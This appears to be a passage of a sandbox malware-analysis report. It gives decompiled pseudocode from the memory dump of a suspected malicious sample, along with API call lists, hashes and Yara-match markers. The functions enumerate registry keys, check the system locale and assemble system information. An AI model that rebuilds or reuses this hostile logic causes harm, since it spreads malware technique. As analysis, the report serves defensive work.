          				_t58 = E005E16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
          				if(_t58 != 0) {
          					goto L21;
          				}
          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
          				goto L4;
          			}

          APIs
          • ResetEvent.KERNEL32(?), ref: 005E4565
          • GetLastError.KERNEL32 ref: 005E457E
            • Part of subcall function 005E16B2: WaitForMultipleObjects.KERNEL32(00000002,005E7C47,00000000,005E7C47,?,?,?,005E7C47,0000EA60), ref: 005E16CD
          • ResetEvent.KERNEL32(?), ref: 005E45F7
          • GetLastError.KERNEL32 ref: 005E4612
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: ErrorEventLastReset$MultipleObjectsWait
          • String ID: @MqtNqt
          • API String ID: 2394032930-2883916605
          • Opcode ID: 004d2bb0b3bda30b2b9fb5715fb6f345a31607adbc88ab1cd85f2bc38ca314e2
          • Instruction ID: d328f52ba08680caa04e69e379ed75f5b6dbd783b09c0cc5ec1fd9c00826bdf1
          • Opcode Fuzzy Hash: 004d2bb0b3bda30b2b9fb5715fb6f345a31607adbc88ab1cd85f2bc38ca314e2
          • Instruction Fuzzy Hash: 4731B532A00684AFCB299BA6CC48E6E7BB9BFD5350F250568E5D1D7190EB30ED45DF10
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 37%
          			E005E607C() {
          				void* _v0;
          				void** _t3;
          				void** _t5;
          				void** _t7;
          				void** _t8;
          				void* _t10;
          
          				_t3 =  *0x5ea3cc; // 0x2bc9600
          				__imp__( &(_t3[0x10]));
          				while(1) {
          					_t5 =  *0x5ea3cc; // 0x2bc9600
          					_t1 =  &(_t5[0x16]); // 0x0
          					if( *_t1 == 0) {
          						break;
          					}
          					Sleep(0xa);
          				}
          				_t7 =  *0x5ea3cc; // 0x2bc9600
          				_t10 =  *_t7;
          				if(_t10 != 0 && _t10 != 0x5eb142) {
          					HeapFree( *0x5ea2d8, 0, _t10);
          					_t7 =  *0x5ea3cc; // 0x2bc9600
          				}
          				 *_t7 = _v0;
          				_t8 =  &(_t7[0x10]);
          				__imp__(_t8);
          				return _t8;
          			}

          APIs
          • RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E6085
          • Sleep.KERNEL32(0000000A), ref: 005E608F
          • HeapFree.KERNEL32(00000000), ref: 005E60BD
          • RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E60D2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
          • String ID: Uqt
          • API String ID: 58946197-2320327147
          • Opcode ID: 5ccf66cbfc686d96be8e9775dac2efe1bd5f3ddf6c126aa0f64cc01d7f9a7d21
          • Instruction ID: 4546fc94082332b2d71242a5773311ebefe2082a5e8d6e48ceb16aca8da4ae00
          • Opcode Fuzzy Hash: 5ccf66cbfc686d96be8e9775dac2efe1bd5f3ddf6c126aa0f64cc01d7f9a7d21
          • Instruction Fuzzy Hash: BBF0B7742002819BE71CCB66DC9DA157FE5AB68391B184454E9829B3A0C630AC48EA26
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,005C167F,0000000A,?,?), ref: 005C1824
          • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 005C1884
          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,005C167F,0000000A), ref: 005C18AF
          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,005C167F,0000000A,?,?), ref: 005C18D0
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,005C167F,0000000A,?,?), ref: 005C18D8
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
          • String ID:
          • API String ID: 2685682793-0
          • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
          • Instruction ID: 05643007c716946cc0ac1b170ba8813b3efe82d3259160a3f3bd2915e04ed04b
          • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
          • Instruction Fuzzy Hash: F82180B6A04108BFD710AFE4DC88FAE7FADFB49391F104439FA05E7191D63099448B68
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 64%
          			E005E23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
          				intOrPtr _v36;
          				intOrPtr _v44;
          				intOrPtr _v48;
          				intOrPtr _v52;
          				void _v60;
          				char _v64;
          				intOrPtr _t18;
          				intOrPtr _t19;
          				intOrPtr _t26;
          				intOrPtr _t27;
          				long _t28;
          
          				_t27 = __edi;
          				_t26 = _a8;
          				_t28 = E005E3A63(_a4, _t26, __edi);
          				if(_t28 != 0) {
          					memset( &_v60, 0, 0x38);
          					_t18 =  *0x5ea348; // 0x25dd5a8
          					_t28 = 0;
          					_v64 = 0x3c;
          					if(_a12 == 0) {
          						_t7 = _t18 + 0x5eb50c; // 0x70006f
          						_t19 = _t7;
          					} else {
          						_t6 = _t18 + 0x5eb8d8; // 0x750072
          						_t19 = _t6;
          					}
          					_v52 = _t19;
          					_push(_t28);
          					_v48 = _a4;
          					_v44 = _t26;
          					_v36 = _t27;
          					E005E5B56();
          					_push( &_v64);
          					if( *0x5ea100() == 0) {
          						_t28 = GetLastError();
          					}
          					_push(1);
          					E005E5B56();
          				}
          				return _t28;
          			}

          APIs
            • Part of subcall function 005E3A63: SysAllocString.OLEAUT32(00000000), ref: 005E3ABD
            • Part of subcall function 005E3A63: SysAllocString.OLEAUT32(0070006F), ref: 005E3AD1
            • Part of subcall function 005E3A63: SysAllocString.OLEAUT32(00000000), ref: 005E3AE3
          • memset.NTDLL ref: 005E23E7
          • GetLastError.KERNEL32 ref: 005E2433
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AllocString$ErrorLastmemset
          • String ID: <$@MqtNqt$E~^
          • API String ID: 3736384471-1384464141
          • Opcode ID: 813dacfdfba08a5d43d0fb86f928b4ad0c5a26a644f7167145eada75754f70f0
          • Instruction ID: 18b98d5834f1e261f2bffaa9246090e36904ca43c152c9c9d4ea01811d0093db
          • Opcode Fuzzy Hash: 813dacfdfba08a5d43d0fb86f928b4ad0c5a26a644f7167145eada75754f70f0
          • Instruction Fuzzy Hash: 67018471900258ABCB18DFA6D889EDE7BBCBB18740F404026F984E7251E77099048B91
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 005C2052
          • GetModuleHandleA.KERNEL32(00000000), ref: 005C2062
          • GetCommandLineW.KERNEL32 ref: 005C206D
            • Part of subcall function 005C1C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 005C1C8D
            • Part of subcall function 005C1C58: Sleep.KERNEL32(00000000,00000030), ref: 005C1CD4
            • Part of subcall function 005C1C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 005C1CFC
            • Part of subcall function 005C1C58: GetSystemDefaultUILanguage.KERNEL32 ref: 005C1D06
            • Part of subcall function 005C1C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 005C1D19
          • HeapDestroy.KERNEL32 ref: 005C2080
          • ExitProcess.KERNEL32 ref: 005C2087
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
          • String ID:
          • API String ID: 1393419808-0
          • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
          • Instruction ID: dd53b29f35778c38de2c8595521148316eafc5483d0bea8f3b2dbcf8bf19a86f
          • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
          • Instruction Fuzzy Hash: 70E0B6B0803620ABC3216F71BE0CA4E7E28BB5AB527000535F605F2125CB384A41CA9C
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 88%
          			E005E4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
          				signed int _v8;
          				char _v12;
          				signed int* _v16;
          				char _v284;
          				void* __esi;
          				char* _t59;
          				intOrPtr* _t60;
          				intOrPtr _t64;
          				char _t65;
          				intOrPtr _t68;
          				intOrPtr _t69;
          				intOrPtr _t71;
          				void* _t73;
          				signed int _t81;
          				void* _t91;
          				void* _t92;
          				char _t98;
          				signed int* _t100;
          				intOrPtr* _t101;
          				void* _t102;
          
          				_t92 = __ecx;
          				_v8 = _v8 & 0x00000000;
          				_t98 = _a16;
          				if(_t98 == 0) {
          					__imp__( &_v284,  *0x5ea3dc);
          					_t91 = 0x80000002;
          					L6:
          					_t59 = E005E6536( &_v284,  &_v284);
          					_a8 = _t59;
          					if(_t59 == 0) {
          						_v8 = 8;
          						L29:
          						_t60 = _a20;
          						if(_t60 != 0) {
          							 *_t60 =  *_t60 + 1;
          						}
          						return _v8;
          					}
          					_t101 = _a24;
          					if(E005E313F(_t92, _t97, _t101, _t91, _t59) != 0) {
          						L27:
          						E005E61DA(_a8);
          						goto L29;
          					}
          					_t64 =  *0x5ea318; // 0x2bc9e18
          					_t16 = _t64 + 0xc; // 0x2bc9f3a
          					_t65 = E005E6536(_t64,  *_t16);
          					_a24 = _t65;
          					if(_t65 == 0) {
          						L14:
          						_t29 = _t101 + 0x14; // 0x102
          						_t33 = _t101 + 0x10; // 0x3d005e90
          						if(E005E7767(_t97,  *_t33, _t91, _a8,  *0x5ea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
          							_t68 =  *0x5ea348; // 0x25dd5a8
          							if(_t98 == 0) {
          								_t35 = _t68 + 0x5ebb5a; // 0x4d4c4b48
          								_t69 = _t35;
          							} else {
          								_t34 = _t68 + 0x5ebbac; // 0x55434b48
          								_t69 = _t34;
          							}
          							if(E005E7238(_t69,  *0x5ea3d4,  *0x5ea3d8,  &_a24,  &_a16) == 0) {
          								if(_t98 == 0) {
          									_t71 =  *0x5ea348; // 0x25dd5a8
          									_t44 = _t71 + 0x5eb332; // 0x74666f53
          									_t73 = E005E6536(_t44, _t44);
          									_t99 = _t73;
          									if(_t73 == 0) {
          										_v8 = 8;
          									} else {
          										_t47 = _t101 + 0x10; // 0x3d005e90
          										E005E5B0E( *_t47, _t91, _a8,  *0x5ea3d8, _a24);
          										_t49 = _t101 + 0x10; // 0x3d005e90
          										E005E5B0E( *_t49, _t91, _t99,  *0x5ea3d0, _a16);
          										E005E61DA(_t99);
          									}
          								} else {
          									_t40 = _t101 + 0x10; // 0x3d005e90
          									E005E5B0E( *_t40, _t91, _a8,  *0x5ea3d8, _a24);
          									_t43 = _t101 + 0x10; // 0x3d005e90
          									E005E5B0E( *_t43, _t91, _a8,  *0x5ea3d0, _a16);
          								}
          								if( *_t101 != 0) {
          									E005E61DA(_a24);
          								} else {
          									 *_t101 = _a16;
          								}
          							}
          						}
          						goto L27;
          					}
          					_t21 = _t101 + 0x10; // 0x3d005e90
          					_t81 = E005E58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
          					if(_t81 == 0) {
          						_t100 = _v16;
          						if(_v12 == 0x28) {
          							 *_t100 =  *_t100 & _t81;
          							_t26 = _t101 + 0x10; // 0x3d005e90
          							E005E7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
          						}
          						E005E61DA(_t100);
          						_t98 = _a16;
          					}
          					E005E61DA(_a24);
          					goto L14;
          				}
          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
          					goto L29;
          				} else {
          					_t97 = _a8;
          					E005E7AB0(_t98, _a8,  &_v284);
          					__imp__(_t102 + _t98 - 0x117,  *0x5ea3dc);
          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
          					_t91 = 0x80000003;
          					goto L6;
          				}
          			}

          APIs
          • StrChrA.SHLWAPI(?,0000005F,00000000,00000000,00000104), ref: 005E4CC7
          • lstrcpy.KERNEL32(?,?), ref: 005E4CF4
            • Part of subcall function 005E6536: lstrlen.KERNEL32(?,00000000,02BC9E18,00000000,005E6F0A,02BCA03B,43175AC3,?,?,?,?,43175AC3,00000005,005EA00C,4D283A53,?), ref: 005E653D
            • Part of subcall function 005E6536: mbstowcs.NTDLL ref: 005E6566
            • Part of subcall function 005E6536: memset.NTDLL ref: 005E6578
            • Part of subcall function 005E5B0E: lstrlenW.KERNEL32(?,?,?,005E4E5D,3D005E90,80000002,?,005E57D1,74666F53,4D4C4B48,005E57D1,?,3D005E90,80000002,?,?), ref: 005E5B33
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • lstrcpy.KERNEL32(?,00000000), ref: 005E4D16
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
          • String ID: vj^
          • API String ID: 3924217599-3170644526
          • Opcode ID: d9ed6927ff31f0e3d936e65091bdb52c28b638190cdf360105f81582b5a7320c
          • Instruction ID: b8a026d0940e0df1c0d008c5a1a2691b61b89dfd02f61e68b5961dd8d277b39f
          • Opcode Fuzzy Hash: d9ed6927ff31f0e3d936e65091bdb52c28b638190cdf360105f81582b5a7320c
          • Instruction Fuzzy Hash: A0518E7250028AEFDF1A9F62DD84EAA3F7AFF58344F008914FA9196021D731E915EF11
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
                          			E005E5704(void* __ecx, char _a4) {
                          				char _v8;
                          				char _v12;
                          				long _v16;
                          				intOrPtr _v20;
                          				long _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				intOrPtr _t35;
                          				intOrPtr _t47;
                          				void* _t51;
                          				void* _t53;

          /* 0x005e5704 */				_t51 = __ecx;
          /* 0x005e571e */				_v8 = 0;
          /* 0x005e5721 */				_v16 = 0;
          /* 0x005e5724 */				_v12 = 0;
          /* 0x005e5727 */				_v24 = 0;
          /* 0x005e5730 */				_t53 =  *0x5ea0f4(0x80000003, 0, 0, 0x20019,  &_v32);
          /* 0x005e5734 */				if(_t53 != 0) {
          /* 0x005e580e */					L18:
          /* 0x005e5812 */					return _t53;
          /* 0x005e5812 */				}
          /* 0x005e573d */				_t53 = 8;
          /* 0x005e5744 */				_t35 = E005E33DC(0x104);
          /* 0x005e5749 */				_v28 = _t35;
          /* 0x005e574e */				if(_t35 == 0) {
          /* 0x005e5803 */					L17:
          /* 0x005e5806 */					 *0x5ea0d4(_v32);
          /* 0x00000000 */					goto L18;
          /* 0x005e580c */				}
          /* 0x005e5754 */				_v20 = 0x104;
          /* 0x005e5757 */				do {
          /* 0x005e575e */					_v16 = _v20;
          /* 0x005e5761 */					_t10 =  &_v12; // 0x5e6a76
          /* 0x005e5768 */					_v12 = 0x104;
          /* 0x005e5777 */					_t53 =  *0x5ea0f8(_v32, _v8, _v28, _t10, 0, 0, 0, 0);
          /* 0x005e577f */					if(_t53 != 0xea) {
          /* 0x005e57b7 */						if(_t53 != 0) {
          /* 0x005e57f1 */							L14:
          /* 0x005e57f7 */							if(_t53 == 0x103) {
          /* 0x005e57f9 */								_t53 = 0;
          /* 0x005e57f9 */							}
          /* 0x005e57fb */							L16:
          /* 0x005e57fe */							E005E61DA(_v28);
          /* 0x00000000 */							goto L17;
          /* 0x005e57fe */						}
          /* 0x005e57b9 */						_t24 =  &_a4; // 0x5e6a76
          /* 0x005e57d1 */						_t53 = E005E4C94(_t51, _v32, _v28, _v24, _v12,  &_v8,  *_t24);
          /* 0x005e57d5 */						if(_t53 != 0) {
          /* 0x00000000 */							goto L14;
          /* 0x00000000 */						}
          /* 0x00000000 */						goto L12;
          /* 0x005e57d5 */					}
          /* 0x005e5784 */					if(_v12 <= 0x104) {
          /* 0x005e5793 */						if(_v16 <= _v20) {
          /* 0x00000000 */							goto L16;
          /* 0x00000000 */						}
          /* 0x005e5798 */						E005E61DA(_v24);
          /* 0x005e57a1 */						_v20 = _v16;
          /* 0x005e57a4 */						_t47 = E005E33DC(_v16);
          /* 0x005e57a9 */						_v24 = _t47;
          /* 0x005e57ae */						if(_t47 != 0) {
          /* 0x005e5789 */							L6:
          /* 0x005e5789 */							_t53 = 0;
          /* 0x00000000 */							goto L12;
          /* 0x005e5789 */						}
          /* 0x005e57b2 */						_t53 = 8;
          /* 0x00000000 */						goto L16;
          /* 0x005e57b2 */					}
          /* 0x005e5786 */					_v8 = _v8 + 1;
          /* 0x00000000 */					goto L6;
          /* 0x005e57d7 */					L12:
          /* 0x005e57e4 */				} while (WaitForSingleObject( *0x5ea30c, 0) == 0x102);
          /* 0x00000000 */				goto L16;
                          			}

          APIs
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vj^,?,?,?,?,?,005E6A76,?), ref: 005E57DE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AllocateHeapObjectSingleWait
          • String ID: 1~^$vj^$vj^
          • API String ID: 3050739573-1616252289
          • Opcode ID: 26056dfc4bb272d2e730f47e387cdae4e44c3f70eb2d9af4a9c5c7219c682c94
          • Instruction ID: a05518775e6b477bad2b884183bb41d5e0a5b5f1db079e1bde34e2cad49a83a5
          • Opcode Fuzzy Hash: 26056dfc4bb272d2e730f47e387cdae4e44c3f70eb2d9af4a9c5c7219c682c94
          • Instruction Fuzzy Hash: 3B314A71C005A9EACF25ABA6CC889AEBF79FB94394F204426E595B2110E2700A51DB90
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 85%
                          			E005E35D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                          				void* _v8;
                          				char _v48;
                          				void* __edi;
                          				intOrPtr _t22;
                          				intOrPtr _t30;
                          				intOrPtr _t34;
                          				intOrPtr* _t42;
                          				void* _t43;
                          				void* _t46;
                          				intOrPtr* _t48;
                          				void* _t49;
                          				intOrPtr _t51;

          /* 0x005e35d9 */				_t42 = _a16;
          /* 0x005e35e0 */				_t48 = __eax;
          /* 0x005e35e4 */				_t22 =  *0x5ea348; // 0x25dd5a8
          /* 0x005e35e9 */				_t2 = _t22 + 0x5eb7bb; // 0x657a6973
          /* 0x005e35f4 */				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
          /* 0x005e3604 */				if( *0x5ea2ec >= 5) {
          /* 0x005e3653 */					_t30 = E005E3CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
          /* 0x005e3658 */					L5:
          /* 0x005e3658 */					_a4 = _t30;
          /* 0x005e365b */					L6:
          /* 0x005e365f */					if(_a4 != 0) {
          /* 0x005e3699 */						L9:
          /* 0x005e3699 */						 *0x5ea2ec =  *0x5ea2ec + 1;
          /* 0x005e369f */						L10:
          /* 0x005e36a6 */						return _a4;
          /* 0x005e36a6 */					}
          /* 0x005e3661 */					_t50 = _a16;
          /* 0x005e3664 */					 *_t48 = _a16;
          /* 0x005e3666 */					_t49 = _v8;
          /* 0x005e3673 */					 *_t42 = E005E56B9(_t50, _t49);
          /* 0x005e3675 */					_t34 = E005E77A5(_t49, _t50);
          /* 0x005e367c */					if(_t34 != 0) {
          /* 0x005e36b3 */						 *_a8 = _t49;
          /* 0x005e36b8 */						 *_a12 = _t34;
          /* 0x005e36ba */						if( *0x5ea2ec < 5) {
          /* 0x005e36bc */							 *0x5ea2ec =  *0x5ea2ec & 0x00000000;
          /* 0x005e36bc */						}
          /* 0x00000000 */						goto L10;
          /* 0x005e36ba */					}
          /* 0x005e367e */					_a4 = 0xbf;
          /* 0x005e3685 */					E005E63F6();
          /* 0x005e3693 */					HeapFree( *0x5ea2d8, 0, _t49);
          /* 0x00000000 */					goto L9;
          /* 0x005e3693 */				}
          /* 0x005e3606 */				_t51 =  *0x5ea3e0; // 0x2bc9c20
          /* 0x005e3621 */				if(RtlAllocateHeap( *0x5ea2d8, 0, 0x800) == 0) {
          /* 0x005e363b */					_a4 = 8;
          /* 0x00000000 */					goto L6;
          /* 0x005e363b */				}
          /* 0x005e3634 */				_t30 = E005E2B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
          /* 0x00000000 */				goto L5;
                          			}

          APIs
          • wsprintfA.USER32 ref: 005E35F4
          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E3619
            • Part of subcall function 005E2B91: GetTickCount.KERNEL32 ref: 005E2BA8
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2BF5
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2C12
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2C34
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2C5B
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2C7C
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2CA7
            • Part of subcall function 005E2B91: HeapFree.KERNEL32(00000000,?), ref: 005E2CBA
          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 005E3693
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: wsprintf$Heap$Free$AllocateCountTick
          • String ID: Uqt
          • API String ID: 1307794992-2320327147
          • Opcode ID: 7b4dd349412ac40b4dc166b1f8b4c20df8e48dc062be97db35e8ef7e2de6d415
          • Instruction ID: d7d477af1c476e1ba56779e70ea42d94f8e9fa053410e0d8de78ee5886722dc7
          • Opcode Fuzzy Hash: 7b4dd349412ac40b4dc166b1f8b4c20df8e48dc062be97db35e8ef7e2de6d415
          • Instruction Fuzzy Hash: B0312175500189EBCB05DF76DC88ADA3BBDFB58351F108422F985AB251D730AA48DBA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 46%
                          			E005E6CDF(intOrPtr* __eax) {
                          				void* _v8;
                          				WCHAR* _v12;
                          				void* _v16;
                          				char _v20;
                          				void* _v24;
                          				intOrPtr _v28;
                          				void* _v32;
                          				intOrPtr _v40;
                          				short _v48;
                          				intOrPtr _v56;
                          				short _v64;
                          				intOrPtr* _t54;
                          				intOrPtr* _t56;
                          				intOrPtr _t57;
                          				intOrPtr* _t58;
                          				intOrPtr* _t60;
                          				void* _t61;
                          				intOrPtr* _t63;
                          				intOrPtr* _t65;
                          				short _t67;
                          				intOrPtr* _t68;
                          				intOrPtr* _t70;
                          				intOrPtr* _t72;
                          				intOrPtr* _t75;
                          				intOrPtr* _t77;
                          				intOrPtr _t79;
                          				intOrPtr* _t83;
                          				intOrPtr* _t87;
                          				intOrPtr _t103;
                          				intOrPtr _t109;
                          				void* _t118;
                          				void* _t122;
                          				void* _t123;
                          				intOrPtr _t130;

          /* 0x005e6ce4 */				_t123 = _t122 - 0x3c;
          /* 0x005e6ced */				_push( &_v8);
          /* 0x005e6cee */				_push(__eax);
          /* 0x005e6cf2 */				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
          /* 0x005e6cf8 */				if(_t118 >= 0) {
          /* 0x005e6cfe */					_t54 = _v8;
          /* 0x005e6d07 */					_t103 =  *0x5ea348; // 0x25dd5a8
          /* 0x005e6d0d */					_t5 = _t103 + 0x5eb038; // 0x3050f485
          /* 0x005e6d17 */					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
          /* 0x005e6d19 */					_t56 = _v8;
          /* 0x005e6d1f */					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
          /* 0x005e6d24 */					if(_t118 >= 0) {
          /* 0x005e6d2f */						__imp__#2(0x5e9284);
          /* 0x005e6d35 */						_v28 = _t57;
          /* 0x005e6d3a */						if(_t57 == 0) {
          /* 0x005e6e5c */							_t118 = 0x8007000e;
          /* 0x005e6d40 */						} else {
          /* 0x005e6d40 */							_t60 = _v32;
          /* 0x005e6d4d */							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
          /* 0x005e6d53 */							_t87 = __imp__#6;
          /* 0x005e6d59 */							_t118 = _t61;
          /* 0x005e6d5d */							if(_t118 >= 0) {
          /* 0x005e6d63 */								_t63 = _v24;
          /* 0x005e6d70 */								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
          /* 0x005e6d74 */								if(_t118 >= 0) {
          /* 0x005e6d7a */									_t130 = _v20;
          /* 0x005e6d7d */									if(_t130 != 0) {
          /* 0x005e6d85 */										_t67 = 3;
          /* 0x005e6d86 */										_v64 = _t67;
          /* 0x005e6d8a */										_v48 = _t67;
          /* 0x005e6d8e */										_v56 = 0;
          /* 0x005e6d91 */										_v40 = 0;
          /* 0x005e6d94 */										if(_t130 > 0) {
          /* 0x005e6d9a */											while(1) {
          /* 0x005e6da3 */												_t68 = _v24;
          /* 0x005e6da9 */												asm("movsd");
          /* 0x005e6daa */												asm("movsd");
          /* 0x005e6dad */												asm("movsd");
          /* 0x005e6dae */												asm("movsd");
          /* 0x005e6daf */												_t123 = _t123;
          /* 0x005e6db7 */												asm("movsd");
          /* 0x005e6db8 */												asm("movsd");
          /* 0x005e6db9 */												asm("movsd");
          /* 0x005e6dbb */												asm("movsd");
          /* 0x005e6dbf */												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
          /* 0x005e6dc3 */												if(_t118 < 0) {
          /* 0x00000000 */													goto L16;
          /* 0x00000000 */												}
          /* 0x005e6dc9 */												_t70 = _v8;
